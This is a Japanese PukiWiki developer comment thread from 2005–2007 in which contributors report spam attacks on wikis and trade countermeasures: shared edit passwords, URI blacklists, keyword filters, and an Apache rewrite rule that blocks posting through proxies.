-- 盛り込みます。  => [[BugTrack/785]] -- [[henoheno]] &new{2005-01-23 (日) 10:46:48};

-「プレビュー」は残して、サブミットボタンを複数(ダミー)にするアイデア。はどうでしょう -- [[itochan]] &new{2005-01-26 (水) 12:53:23};
--んと・・・・見分けは付くんでしょうか (^^; -- [[teanan]] &new{2005-01-26 (水) 13:50:44};
-- 事前に必ずプレビューを見させるとか、ログインを必要とするような仕掛けがあっても、SPAMが入っているところには入っているようです。 -- [[henoheno]] &new{2005-01-26 (水) 23:03:24};

-似たようなことはやはり誰でも考えるものですね :)  http://www.intertwingly.net/wiki/pie/SpamWords -- [[henoheno]] &new{2005-01-26 (水) 23:12:05};

-plamo linux  wiki の場合 -- 編集認証をかけ、パスワードを皆で共有 http://plamo.linet.gr.jp/ --  &new{2005-02-04 (金) 23:01:45};
-editプラグインの名前を変えたらどうでしょうか。define定義あたりで変えやすくして、気が向いた時に変更するとか…。 -- [[nazuna]] &new{2005-02-17 (木) 09:52:53};
-爆撃されています。 http://linux2ch.bbzone.net/index.php?Bbs -- [[名無しさん]] &new{2005-03-11 (金) 09:13:53};
-こちらも爆撃されています。3/5以降にBbsページを狙った爆撃が起きているようです。 http://www.opendt.org/pukiwiki/pukiwiki.php?Bbs -- [[名無しさん]] &new{2005-03-11 (金) 09:23:12};
-またもXOOPS日本公式のWikiがやられていました。ページそのものは修正済みなので、バックアップの方にリンク貼っておきます。&br; http://xoops.sourceforge.jp/wiki/xoops2/index?cmd=backup&page=FrontPage&age=13 -- [[dolph]] &new{2005-04-11 (月) 13:20:15};
--あ、これってさっきorgにきたのと同じですね。ちゃちゃっと消しちゃいました (^^; → http&#x3a;//pukiwiki.org/index.php?cmd=diff&page=PhpWiki -- [[teanan]] &new{2005-04-11 (月) 14:06:16};
-下のはどこかのスパムのサンプルですか? -- [[Ratbeta]] &new{2005-04-17 (日) 16:01:36};
--あら、消えた…。やっぱりスパムだったみたいですね (^^; -- [[Ratbeta]] &new{2005-04-17 (日) 16:02:11};
-- どうやらスパムの実サンプルが、書き込まれるや否や瞬間的に削除された模様です (^^; -- [[henoheno]] &new{2005-04-17 (日) 16:03:16};
---えっ?サンプルだったの?すんません、消しちゃいました((わー、ごめんなさい、ごめんなさい、ごめんなさい、ぶたないで~))… orz -- [[ishii]] &new{2005-04-17 (日) 16:08:16};
--あー、いいんですいいんです (^^; 実サンプル = ''本物のSPAM''という意味で書いたつもりだったのでした。書き込まれたSPAMが瞬間的に取り除かれたので、びっくりしただけです (^^; こちらこそ慌てさせてすいません。-- [[henoheno]] &new{2005-04-17 (日) 18:03:38};
- PukiWiki もブラックリスト対応に http://blog.woremacx.com/2005/10/pukiwiki_bbq.html --  &new{2005-12-30 (金) 17:38:31};

- (tracker関連を別項目に分けました。) -- [[teanan]] &new{2006-05-20 (土) 09:36:00};

- 書評Wiki:大量のスパムで一時運営中止 http://ryouchi.seesaa.net/article/17967908.html --  &new{2006-05-20 (土) 02:09:29};
 http://mystery.parfait.ne.jp/wiki/
 大量のスパム(2分で200通ぐらい)がやってきたので、対策をたてるまで、
 一時閉鎖します。
 正直、どう対処すればいいのか、途方にくれています。
 ひとつひとつ丁寧にIPアドレスを弾く以外にないのでしょうか?
 腹立たしいことに、書き込みのIPアドレスがいちいち変わっていて、
 正直、やってられません。
 いい方法をご存知の方がいらしたら ... まで連絡をお願いします。
 よろしくお願いいたします。
-- 本件については、[[Linux Wiki>http://oku.edu.mie-u.ac.jp/~okumura/linux/]]の様に、編集認証でブロックする(そのアカウントはユーザーと共有する)のが手早いのではないかということで、ひとまずその旨連絡しました。 -- [[henoheno]] &new{2006-05-20 (土) 07:23:44};
- 台湾のcandyzさんの所も、SPAMがひどくてトップページをPukiWikiではなくした模様。同じ対応をとりあえずアドバイス。 http://cle.linux.org.tw/wp/archives/3 -- [[henoheno]] &new{2006-05-21 (日) 23:38:59};
- [[teanan:自作プラグイン/comment.inc.php]] --  &new{2006-06-11 (日) 21:09:15};
-- あら、ここにリンクが (^^; -- [[teanan]] &new{2006-06-12 (月) 20:33:06};
- 最近BugTrackへのSPAMが多いですねぇ。パターンから見て、ご丁寧にもフォームから投稿しているっぽいですね。 -- [[teanan]] &new{2006-06-12 (月) 20:36:06};
-- そうですね。もう少し踏み込んだ(実践的な)SPAM対策がさらにいくつか必要になってきている様です。次のリリースまでの間に取り組むべき結構重たいテーマになると思います。何たって、Wikiに対するAnti SPAMをみんな模索している(一部の人はIPの判定やNGワードで全て解決すると思っている)状態で、ちゃんと役に立つ実装を作って、管理者が設定管理地獄に陥らないようなものじゃないといけませんから。 -- [[henoheno]] &new{2006-06-12 (月) 21:07:54};
-- とりあえず、trackerとcommentのSPAM対策を優先すると、幸せになれる人が多そうな気がします :) -- [[teanan]] &new{2006-06-13 (火) 07:09:07};
-- とりあえず、このページからリンクされていないようなので: [[PukiWiki/1.4/ちょっと便利に/指定単語を含むメッセージを制限する/commentプラグイン]] -- [[henoheno]] &new{2006-06-23 (金) 00:33:11};
- とりあえず、こちらでは、プロクシからの''投稿のみ''禁止することにしました。<limit>を入れているわけは、検索用クロウラーまで弾いてしまう可能性があることと、何も閲覧する上プロクシ使われることで迷惑なことはないと思ったためです。 -- [[Logue]] &new{2006-07-28 (金) 13:56:39};
 <LimitExcept GET HEAD>
 	RewriteCond %{HTTP_CONNECTION} !keep-alive [NC,OR]
 	RewriteCond %{REMOTE_HOST} ^firewall [NC,OR]
 	RewriteCond %{REMOTE_HOST} proxy [NC,OR]
 	RewriteCond %{REMOTE_HOST} cache [NC,OR]
 	RewriteCond %{REMOTE_HOST} delegate [NC,OR]
 	RewriteCond %{REMOTE_HOST} ^dns [NC,OR]
 	RewriteCond %{REMOTE_HOST} keeper [NC,OR]
 	RewriteCond %{REMOTE_HOST} ^mail [NC,OR]
 	RewriteCond %{REMOTE_HOST} ^www [NC,OR]
 	RewriteCond %{HTTP_CACHE_CONTROL} DelGate [NC]
 	RewriteCond %{HTTP_USER_AGENT} via [NC]
 	RewriteCond %{HTTP_USER_AGENT} squid [NC]
 	RewriteCond %{HTTP_USER_AGENT} delegate [NC]
 	RewriteCond %{HTTP_USER_AGENT} httpd [NC]
 	RewriteCond %{HTTP_USER_AGENT} proxy [NC]
 	RewriteCond %{HTTP_USER_AGENT} cache [NC]
 	RewriteCond %{HTTP:Via} !^$ [OR] 
 	RewriteCond %{HTTP_FORWARDED} !^$ [OR]
 	RewriteCond %{HTTP:X-Forwarded} !^$ [OR]
 	RewriteCond %{HTTP:Client-IP} ^$ [OR]
 	RewriteCond %{HTTP:Forwarded-For} ^$ [OR]
 	RewriteCond %{HTTP:x-forwarded-for} ^$
 	RewriteCond DUMMY CONDITION
 	RewriteRule ^.*$ - [F]
 </LimitExcept>
ただ単に掲示板用のプロクシキックのスクリプトをRewriteCondで書き直しただけで、文法に間違いとかありそうですが、それなりに効果はあるかと。

ただ、[[Tor>http://tor.eff.org/]]を悪用したbotの対処方法が思いつかない・・・。
- [[BugTrack2/200]] [spam] URI spamフィルタ (Part 1) とブロック機構: 概要 -- [[henoheno]] &new{2006-11-19 (日) 20:12:04};
- 日本語が読める相手以外除外してしまう方法。面白いかと。http://www.geekpage.jp/blog/?id=2007/1/14 --  &new{2007-02-17 (土) 17:54:56};
- http://chongqed.org spam報告 --  &new{2007-03-06 (火) 13:55:27};

//#comment

トップ   編集 差分 バックアップ 添付 複製 名前変更 リロード   新規 一覧 検索 最終更新   ヘルプ   最終更新のRSS
Site admin: PukiWiki Development Team

PukiWiki 1.5.3+ © 2001-2020 PukiWiki Development Team. Powered by PHP 5.6.40-0+deb8u12. HTML convert time: 0.080 sec.

OSDN